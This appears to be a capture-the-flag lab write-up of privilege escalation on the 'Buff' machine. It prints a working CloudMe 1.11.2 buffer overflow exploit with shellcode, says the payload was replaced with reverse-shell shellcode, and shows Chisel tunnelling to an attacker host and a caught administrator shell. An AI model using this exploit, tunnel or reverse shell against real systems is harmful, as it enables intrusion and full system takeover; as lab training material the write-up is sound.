InfoSec LAB

Buff_Privilege_Escalation

Created: 3 min read

CVE-2018-6892

The vulnerability ultimately led to another vulnerability,CVE-2018-7886, due to incompetent fix of CVE-2018-6892 This also appears to affect the version 1.11.2

Exploit

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
 
#Instructions:
# Start the CloudMe service and run the script.
 
import socket
 
target = "127.0.0.1"
 
padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30
 
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
 
overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
 
buf = padding1 + EIP + NOPS + payload + overrun
 
try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8888))
	s.send(buf)
except Exception as e:
	print(sys.exc_value)

It’s a typical stack buffer overflow. It’s launching calc.exe upon exploitation, so that would need some fixing

I replaced the payload to a reverse shell shellcode

Now that the exploit is ready, I would have to expose the CloudMe service running on the target socket127.0.0.1:8888

Tunneling with Chisel

c:\tmp> copy \\10.10.14.11\smb\chiselx64.exe .
The system cannot find the file specified.
 
c:\tmp> copy \\10.10.14.11\smb\chiselx64.exe .
        1 file(s) copied.
 
c:\tmp> chiselx64.exe client 10.10.14.11:55555 R:8888:127.0.0.1:8888
2023/01/27 12:49:59 client: Connecting to ws://10.10.14.11:55555
2023/01/27 12:50:00 client: Connected (Latency 43.5831ms)

From the target system, tunneling the port 8888 on the loopback to the Kali port 8888

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ chisel server -p 55555 --reverse
2023/01/27 13:48:50 server: Reverse tunnelling enabled
2023/01/27 13:48:50 server: Fingerprint GLs10dbNG0clCWMvjCRWukNi6XUvu1FXKaNsDgUj/L4=
2023/01/27 13:48:50 server: Listening on http://0.0.0.0:55555
2023/01/27 13:50:00 server: session#1: tun: proxy#R:8888=>8888: Listening

Tunnel is established. The CloudMe service should now be within reach from the Kali port 8888

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ python3 cloudme_bof.py

Launching the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.198] 49687
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
 whoami
buff\administrator
 
C:\Windows\system32> hostname
 hostname
BUFF
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::225
   IPv6 Address. . . . . . . . . . . : dead:beef::cd03:7ac5:8f80:ff81
   Temporary IPv6 Address. . . . . . : dead:beef::84f1:21f6:5782:110
   Link-local IPv6 Address . . . . . : fe80::cd03:7ac5:8f80:ff81%10
   IPv4 Address. . . . . . . . . . . : 10.10.10.198
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%10
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks